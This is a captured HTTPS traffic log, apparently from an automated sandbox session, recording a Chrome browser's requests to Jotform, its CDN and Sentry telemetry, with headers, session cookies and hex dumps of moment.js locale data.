                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC253OUTData Raw: 7b 7d 0a 7b 22 74 79 70 65 22 3a 22 63 6c 69 65 6e 74 5f 72 65 70 6f 72 74 22 7d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 36 35 31 32 35 37 32 2e 31 36 39 2c 22 64 69 73 63 61 72 64 65 64 5f 65 76 65 6e 74 73 22 3a 5b 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 65 72 72 6f 72 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 2c 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 74 72 61 6e 73 61 63 74 69 6f 6e 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 2c 7b 22 72 65 61 73 6f 6e 22 3a 22 73 61 6d 70 6c 65 5f 72 61 74 65 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 73 70 61 6e 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 5d 7d
                                                                                                                                                                                                                                            Data Ascii: {}{"type":"client_report"}{"timestamp":1736512572.169,"discarded_events":[{"reason":"sample_rate","category":"error","quantity":1},{"reason":"sample_rate","category":"transaction","quantity":1},{"reason":"sample_rate","category":"span","quantity":1}]}
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:13 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2{}0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            45192.168.2.174975834.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            46192.168.2.1749759104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC643OUTGET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Range: bytes=358478-369018
                                                                                                                                                                                                                                            If-Range: "d458b68730a7330653700489333a7837"
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC462INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 10541
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 106
                                                                                                                                                                                                                                            last-modified: Thu, 12 Dec 2024 12:31:15 GMT
                                                                                                                                                                                                                                            etag: "d458b68730a7330653700489333a7837"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Content-Range: bytes 358478-369018/369019
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6270c1d5e64-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC907INData Raw: 78 66 61 74 5c 78 65 39 22 2c 6d 6d 3a 22 25 64 20 6d 7e 5c 78 65 64 5c 78 66 31 5c 78 66 61 7e 74 5c 78 65 39 73 22 2c 68 3a 22 5c 78 65 31 7e 5c 78 66 31 20 68 5c 78 66 33 7e 5c 78 66 61 72 22 2c 68 68 3a 22 25 64 20 68 7e 5c 78 66 33 5c 78 66 61 72 73 22 2c 64 3a 22 5c 78 65 31 20 7e 64 5c 78 65 31 5c 78 66 64 22 2c 64 64 3a 22 25 64 20 64 7e 5c 78 65 31 5c 78 66 64 73 22 2c 4d 3a 22 5c 78 65 31 20 7e 6d 5c 78 66 33 5c 78 66 31 7e 74 68 22 2c 4d 4d 3a 22 25 64 20 6d 7e 5c 78 66 33 5c 78 66 31 74 7e 68 73 22 2c 79 3a 22 5c 78 65 31 20 7e 5c 78 66 64 5c 78 65 39 5c 78 65 31 72 22 2c 79 79 3a 22 25 64 20 5c 78 66 64 7e 5c 78 65 39 5c 78 65 31 72 73 22 7d 2c 64 61 79 4f 66 4d 6f 6e 74 68 4f 72 64 69 6e 61 6c 50 61 72 73 65 3a 2f 5c 64 7b 31 2c 32 7d 28 74
                                                                                                                                                                                                                                            Data Ascii: xfat\xe9",mm:"%d m~\xed\xf1\xfa~t\xe9s",h:"\xe1~\xf1 h\xf3~\xfar",hh:"%d h~\xf3\xfars",d:"\xe1 ~d\xe1\xfd",dd:"%d d~\xe1\xfds",M:"\xe1 ~m\xf3\xf1~th",MM:"%d m~\xf3\xf1t~hs",y:"\xe1 ~\xfd\xe9\xe1r",yy:"%d \xfd~\xe9\xe1rs"},dayOfMonthOrdinalParse:/\d{1,2}(t
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 31 65 62 39 5c 75 30 33 30 31 67 75 6e 5f 5c 75 31 65 63 63 6a 5c 75 31 65 63 64 5c 75 30 33 30 31 72 75 5c 75 30 33 30 31 5f 5c 75 31 65 63 63 6a 5c 75 31 65 63 64 5c 75 30 33 30 31 62 5c 75 31 65 63 64 5f 5c 75 31 65 62 38 74 69 5c 75 30 33 30 30 5f 41 5c 75 30 33 30 30 62 61 5c 75 30 33 30 31 6d 5c 75 31 65 62 39 5c 75 30 33 30 31 74 61 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 77 65 65 6b 64 61 79 73 53 68 6f 72 74 3a 22 41 5c 75 30 33 30 30 69 5c 75 30 33 30 30 6b 5f 41 6a 65 5c 75 30 33 30 31 5f 49 5c 75 30 33 30 30 73 5c 75 31 65 62 39 5c 75 30 33 30 31 5f 5c 75 31 65 63 63 6a 72 5f 5c 75 31 65 63 63 6a 62 5f 5c 75 31 65 62 38 74 69 5c 75 30 33 30 30 5f 41 5c 75 30 33 30 30 62 61 5c 75 30 33 30 31 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 77 65 65 6b 64
                                                                                                                                                                                                                                            Data Ascii: 1eb9\u0301gun_\u1eccj\u1ecd\u0301ru\u0301_\u1eccj\u1ecd\u0301b\u1ecd_\u1eb8ti\u0300_A\u0300ba\u0301m\u1eb9\u0301ta".split("_"),weekdaysShort:"A\u0300i\u0300k_Aje\u0301_I\u0300s\u1eb9\u0301_\u1eccjr_\u1eccjb_\u1eb8ti\u0300_A\u0300ba\u0301".split("_"),weekd
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 5c 75 36 37 30 38 5f 5c 75 35 33 34 31 5c 75 34 65 38 63 5c 75 36 37 30 38 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 22 31 5c 75 36 37 30 38 5f 32 5c 75 36 37 30 38 5f 33 5c 75 36 37 30 38 5f 34 5c 75 36 37 30 38 5f 35 5c 75 36 37 30 38 5f 36 5c 75 36 37 30 38 5f 37 5c 75 36 37 30 38 5f 38 5c 75 36 37 30 38 5f 39 5c 75 36 37 30 38 5f 31 30 5c 75 36 37 30 38 5f 31 31 5c 75 36 37 30 38 5f 31 32 5c 75 36 37 30 38 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 77 65 65 6b 64 61 79 73 3a 22 5c 75 36 36 31 66 5c 75 36 37 31 66 5c 75 36 35 65 35 5f 5c 75 36 36 31 66 5c 75 36 37 31 66 5c 75 34 65 30 30 5f 5c 75 36 36 31 66 5c 75 36 37 31 66 5c 75 34 65 38 63 5f 5c 75 36 36 31 66 5c 75 36 37 31 66 5c 75 34 65 30 39 5f 5c 75 36 36 31 66 5c
                                                                                                                                                                                                                                            Data Ascii: \u6708_\u5341\u4e8c\u6708".split("_"),monthsShort:"1\u6708_2\u6708_3\u6708_4\u6708_5\u6708_6\u6708_7\u6708_8\u6708_9\u6708_10\u6708_11\u6708_12\u6708".split("_"),weekdays:"\u661f\u671f\u65e5_\u661f\u671f\u4e00_\u661f\u671f\u4e8c_\u661f\u671f\u4e09_\u661f\
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 22 3a 22 5b 5c 75 36 37 32 63 5d 64 64 64 4c 54 22 7d 2c 6c 61 73 74 44 61 79 3a 22 5b 5c 75 36 36 32 38 5c 75 35 39 32 39 5d 4c 54 22 2c 6c 61 73 74 57 65 65 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 65 65 6b 28 29 21 3d 3d 65 2e 77 65 65 6b 28 29 3f 22 5b 5c 75 34 65 30 61 5d 64 64 64 4c 54 22 3a 22 5b 5c 75 36 37 32 63 5d 64 64 64 4c 54 22 7d 2c 73 61 6d 65 45 6c 73 65 3a 22 4c 22 7d 2c 64 61 79 4f 66 4d 6f 6e 74 68 4f 72 64 69 6e 61 6c 50 61 72 73 65 3a 2f 5c 64 7b 31 2c 32 7d 28 5c 75 36 35 65 35 7c 5c 75 36 37 30 38 7c 5c 75 35 34 36 38 29 2f 2c 6f 72 64 69 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 22 64 22 3a 63 61 73 65 22 44 22 3a 63 61 73 65 22 44 44 44
                                                                                                                                                                                                                                            Data Ascii: ":"[\u672c]dddLT"},lastDay:"[\u6628\u5929]LT",lastWeek:function(e){return this.week()!==e.week()?"[\u4e0a]dddLT":"[\u672c]dddLT"},sameElse:"L"},dayOfMonthOrdinalParse:/\d{1,2}(\u65e5|\u6708|\u5468)/,ordinal:function(e,a){switch(a){case"d":case"D":case"DDD
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 2c 4c 54 53 3a 22 48 48 3a 6d 6d 3a 73 73 22 2c 4c 3a 22 59 59 59 59 2f 4d 4d 2f 44 44 22 2c 4c 4c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 22 2c 4c 4c 4c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 20 48 48 3a 6d 6d 22 2c 4c 4c 4c 4c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 64 64 64 64 20 48 48 3a 6d 6d 22 2c 6c 3a 22 59 59 59 59 2f 4d 2f 44 22 2c 6c 6c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 22 2c 6c 6c 6c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 20 48 48 3a 6d 6d 22 2c 6c 6c 6c 6c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 64 64 64 64 20
                                                                                                                                                                                                                                            Data Ascii: ,LTS:"HH:mm:ss",L:"YYYY/MM/DD",LL:"YYYY\u5e74M\u6708D\u65e5",LLL:"YYYY\u5e74M\u6708D\u65e5 HH:mm",LLLL:"YYYY\u5e74M\u6708D\u65e5dddd HH:mm",l:"YYYY/M/D",ll:"YYYY\u5e74M\u6708D\u65e5",lll:"YYYY\u5e74M\u6708D\u65e5 HH:mm",llll:"YYYY\u5e74M\u6708D\u65e5dddd
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 6f 6e 74 68 73 3a 22 5c 75 34 65 30 30 5c 75 36 37 30 38 5f 5c 75 34 65 38 63 5c 75 36 37 30 38 5f 5c 75 34 65 30 39 5c 75 36 37 30 38 5f 5c 75 35 36 64 62 5c 75 36 37 30 38 5f 5c 75 34 65 39 34 5c 75 36 37 30 38 5f 5c 75 35 31 36 64 5c 75 36 37 30 38 5f 5c 75 34 65 30 33 5c 75 36 37 30 38 5f 5c 75 35 31 36 62 5c 75 36 37 30 38 5f 5c 75 34 65 35 64 5c 75 36 37 30 38 5f 5c 75 35 33 34 31 5c 75 36 37 30 38 5f 5c 75 35 33 34 31 5c 75 34 65 30 30 5c 75 36 37 30 38 5f 5c 75 35 33 34 31 5c 75 34 65 38 63 5c 75 36 37 30 38 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 22 31 5c 75 36 37 30 38 5f 32 5c 75 36 37 30 38 5f 33 5c 75 36 37 30 38 5f 34 5c 75 36 37 30 38 5f 35 5c 75 36 37 30 38 5f 36 5c 75 36 37 30 38 5f 37 5c 75 36 37 30 38
                                                                                                                                                                                                                                            Data Ascii: onths:"\u4e00\u6708_\u4e8c\u6708_\u4e09\u6708_\u56db\u6708_\u4e94\u6708_\u516d\u6708_\u4e03\u6708_\u516b\u6708_\u4e5d\u6708_\u5341\u6708_\u5341\u4e00\u6708_\u5341\u4e8c\u6708".split("_"),monthsShort:"1\u6708_2\u6708_3\u6708_4\u6708_5\u6708_6\u6708_7\u6708
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 22 5c 75 34 65 30 62 5c 75 35 33 34 38 22 3a 22 5c 75 36 36 35 61 5c 75 34 65 30 61 22 7d 2c 63 61 6c 65 6e 64 61 72 3a 7b 73 61 6d 65 44 61 79 3a 22 5b 5c 75 34 65 63 61 5c 75 35 39 32 39 5d 20 4c 54 22 2c 6e 65 78 74 44 61 79 3a 22 5b 5c 75 36 36 30 65 5c 75 35 39 32 39 5d 20 4c 54 22 2c 6e 65 78 74 57 65 65 6b 3a 22 5b 5c 75 34 65 30 62 5d 64 64 64 64 20 4c 54 22 2c 6c 61 73 74 44 61 79 3a 22 5b 5c 75 36 36 32 38 5c 75 35 39 32 39 5d 20 4c 54 22 2c 6c 61 73 74 57 65 65 6b 3a 22 5b 5c 75 34 65 30 61 5d 64 64 64 64 20 4c 54 22 2c 73 61 6d 65 45 6c 73 65 3a 22 4c 22 7d 2c 64 61 79 4f 66 4d 6f 6e 74 68 4f 72 64 69 6e 61 6c 50 61 72 73 65 3a 2f 5c 64 7b 31 2c 32 7d 28 5c 75 36 35 65 35 7c 5c 75 36 37 30 38 7c 5c 75 39 30 33 31 29 2f 2c 6f 72 64 69 6e 61 6c
                                                                                                                                                                                                                                            Data Ascii: "\u4e0b\u5348":"\u665a\u4e0a"},calendar:{sameDay:"[\u4eca\u5929] LT",nextDay:"[\u660e\u5929] LT",nextWeek:"[\u4e0b]dddd LT",lastDay:"[\u6628\u5929] LT",lastWeek:"[\u4e0a]dddd LT",sameElse:"L"},dayOfMonthOrdinalParse:/\d{1,2}(\u65e5|\u6708|\u9031)/,ordinal
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC1369INData Raw: 6d 22 2c 4c 54 53 3a 22 48 48 3a 6d 6d 3a 73 73 22 2c 4c 3a 22 59 59 59 59 2f 4d 4d 2f 44 44 22 2c 4c 4c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 22 2c 4c 4c 4c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 20 48 48 3a 6d 6d 22 2c 4c 4c 4c 4c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 64 64 64 64 20 48 48 3a 6d 6d 22 2c 6c 3a 22 59 59 59 59 2f 4d 2f 44 22 2c 6c 6c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 22 2c 6c 6c 6c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 20 48 48 3a 6d 6d 22 2c 6c 6c 6c 6c 3a 22 59 59 59 59 5c 75 35 65 37 34 4d 5c 75 36 37 30 38 44 5c 75 36 35 65 35 64 64 64
                                                                                                                                                                                                                                            Data Ascii: m",LTS:"HH:mm:ss",L:"YYYY/MM/DD",LL:"YYYY\u5e74M\u6708D\u65e5",LLL:"YYYY\u5e74M\u6708D\u65e5 HH:mm",LLLL:"YYYY\u5e74M\u6708D\u65e5dddd HH:mm",l:"YYYY/M/D",ll:"YYYY\u5e74M\u6708D\u65e5",lll:"YYYY\u5e74M\u6708D\u65e5 HH:mm",llll:"YYYY\u5e74M\u6708D\u65e5ddd
                                                                                                                                                                                                                                            2025-01-10 12:36:14 UTC51INData Raw: 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6d 6f 6d 65 6e 74 2d 77 69 74 68 2d 6c 6f 63 61 6c 65 73 2e 6d 69 6e 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                            Data Ascii: //# sourceMappingURL=moment-with-locales.min.js.map


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            47192.168.2.1749755104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC812OUTPOST /server/check-olark-chat-support?from=app-builder HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1328INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            jf-trace-id: 0c5223593ed97cc0
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:15 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /server/check-olark-chat-support
                                                                                                                                                                                                                                            access-control-allow-credentials: true
                                                                                                                                                                                                                                            access-control-allow-origin: https://eu.jotform.com
                                                                                                                                                                                                                                            access-control-request-method: POST, OPTIONS, GET
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC164INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 68 65 61 64 65 72 73 3a 20 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 2c 20 58 2d 50 72 6f 74 6f 74 79 70 65 2d 56 65 72 73 69 6f 6e 0d 0a 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 36 32 61 36 63 37 66 34 32 63 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: access-control-allow-headers: X-Requested-With, X-Prototype-Versionvia: 1.1 googleCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb62a6c7f42c4-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC10INData Raw: 35 0d 0a 46 41 4c 53 45 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 5FALSE
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            48192.168.2.1749760104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC395OUTGET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 369019
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 107
                                                                                                                                                                                                                                            last-modified: Thu, 12 Dec 2024 12:31:15 GMT
                                                                                                                                                                                                                                            etag: "d458b68730a7330653700489333a7837"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62b3b2e3308-EWR
